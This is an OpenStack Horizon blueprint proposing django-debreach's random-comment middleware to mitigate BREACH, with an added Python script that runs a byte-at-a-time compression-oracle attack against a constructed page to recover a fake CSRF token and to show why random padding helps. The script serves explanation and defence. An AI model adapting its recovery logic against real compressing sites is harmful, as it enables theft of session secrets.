Mitigate BREACH attacks using django-debreach

Registered by Nishant Kumar

BREACH is a category of vulnerabilities and not a specific instance affecting a specific piece of software: it is a side channel in which an attacker who can observe the size of compressed HTTPS responses, and can get input of their own reflected into those responses, recovers a secret carried in the same response one character at a time, because a guess that matches the secret compresses slightly better than one that does not. To be vulnerable, a web application must, at the same time:

  * Be served with HTTP-level compression (gzip or deflate Content-Encoding)
  * Reflect user input in HTTP response bodies
  * Reflect a secret (such as a CSRF token) in the same HTTP response bodies

Horizon meets all three conditions, so we can add the django-debreach module to Horizon's requirements; it provides mitigation against BREACH.

https://github.com/lpomfrey/django-debreach

Django 1.10+ already masks the CSRF token with a fresh per-response mask, so the token's reflected form changes on every render and cannot be accumulated across requests; that covers what django-debreach's own CSRF token masking does. Therefore only the other feature django-debreach provides needs to be enabled: its RandomCommentMiddleware, which appends an HTML comment of random length to each response so that the compressed content length varies between otherwise identical responses. This hides the one-character signal behind noise rather than removing it, so it raises the number of requests an attacker needs instead of ruling the attack out; the two mitigations are meant to be used together.
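The three conditions and the random-comment mitigation in runnable form, as an added example that is not Horizon's or django-debreach's code: a Python script that plays BREACH against a constructed page (a hidden CSRF input plus a reflected search string, a made-up token, and zlib forced to fixed Huffman blocks with Z_FIXED so that the result is deterministic; real servers emit dynamic blocks, which the attacker copes with by sending more requests), then repeats the attack against a page padded with a constant-length HTML comment and against one padded with a random-length comment. The random comment stands in for the idea behind django-debreach's RandomCommentMiddleware; its exact length range and markup here are assumptions, as are the page template, token and alphabet.

```python
"""Added example: a BREACH compression oracle against a page that reflects user
input next to a CSRF token, and why random-length padding blunts it."""
import random
import string
import zlib

TOKEN = "k4f9x2n7pa"  # constructed secret standing in for a CSRF token
ALPHABET = string.ascii_lowercase + string.digits  # constructed token alphabet


def render(secret: str, reflected: bytes, comment: bytes = b"") -> bytes:
    """Constructed template meeting all three BREACH conditions: it embeds the
    secret, reflects attacker-controlled input, and (below) gets compressed."""
    return (b'<input type="hidden" name="csrfmiddlewaretoken" value="'
            + secret.encode() + b'"><p>Search results for [' + reflected
            + b"]</p>" + comment)


def deflate_len(body: bytes) -> int:
    """Compressed size in bytes: what a network observer sees. Z_FIXED forces
    fixed Huffman blocks so the demo is deterministic (assumption: real servers
    use dynamic blocks, which adds noise the attacker averages out)."""
    z = zlib.compressobj(9, zlib.DEFLATED, -15, 9, zlib.Z_FIXED)
    return len(z.compress(body) + z.flush())


def bit_len(oracle, probe: bytes) -> int:
    """Recover a bit-exact size from byte-granular responses. Each pad byte
    0xF0.. is a distinct 9-bit literal under fixed Huffman and never forms an
    LZ77 match, so eight probes cycle through every byte alignment and the sum
    of their lengths equals the unpadded bit count plus 35."""
    return sum(oracle(bytes(range(0xF0, 0xF0 + k)) + probe) for k in range(8)) - 35


def recover(oracle, length: int) -> str:
    """Byte-at-a-time BREACH: reflect 'value="' + known prefix + guess; the
    correct guess extends the LZ77 match against the real token by one byte,
    so it compresses about one literal (8 bits) smaller than every wrong one."""
    known = ""
    for _ in range(length):
        scores = {c: bit_len(oracle, b'value="' + (known + c).encode())
                  for c in ALPHABET}
        known += min(scores, key=scores.get)
    return known


def plain_oracle(reflected: bytes) -> int:
    return deflate_len(render(TOKEN, reflected))


def fixed_comment_oracle(reflected: bytes) -> int:
    # A constant-length comment shifts every response equally: no protection.
    return deflate_len(render(TOKEN, reflected, b"<!-- FIXED PAD -->"))


_rng = random.Random(1234)  # seeded only so the demo repeats; use os.urandom in production


def random_comment_oracle(reflected: bytes) -> int:
    """Random-length comment per response, the idea behind django-debreach's
    RandomCommentMiddleware (assumed shape; the real length range differs)."""
    filler = "".join(_rng.choice(string.ascii_uppercase)
                     for _ in range(_rng.randint(12, 72))).encode()
    return deflate_len(render(TOKEN, reflected, b"<!-- " + filler + b" -->"))


def length_spread(oracle, samples: int = 200) -> int:
    """Range of lengths seen for one identical request: the 8-bit signal from a
    correct guess has to be dug out from under this much noise."""
    lengths = [oracle(b'value="k') for _ in range(samples)]
    return max(lengths) - min(lengths)


if __name__ == "__main__":
    print("plain page      ->", recover(plain_oracle, len(TOKEN)))
    print("fixed comment   ->", recover(fixed_comment_oracle, len(TOKEN)))
    print("random comment  -> %d bytes of spread across identical requests"
          % length_spread(random_comment_oracle))
```

Run as a script, the plain page and the fixed-comment page both give up the whole token with 36 guesses times 8 alignment probes per character, which is the point of the constant-length case: padding only helps if its length is unpredictable per response. The random-comment page instead shows a spread of tens of bytes between identical requests, far more than the one-literal signal, so the attacker is reduced to averaging many responses per guess. That is why the per-response CSRF token masking stays on as well: it changes the secret's reflected form on every response, so there is nothing stable to average towards.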

Blueprint information

Status:
Complete
Approver:
Ivan Kolodyazhny
Priority:
Medium
Drafter:
Nishant Kumar
Direction:
Approved
Assignee:
Nishant Kumar
Definition:
Approved
Series goal:
Accepted for 15.0.0-stein
Implementation:
Implemented
Milestone target:
stein-1
Started by
Akihiro Motoki
Completed by
Akihiro Motoki
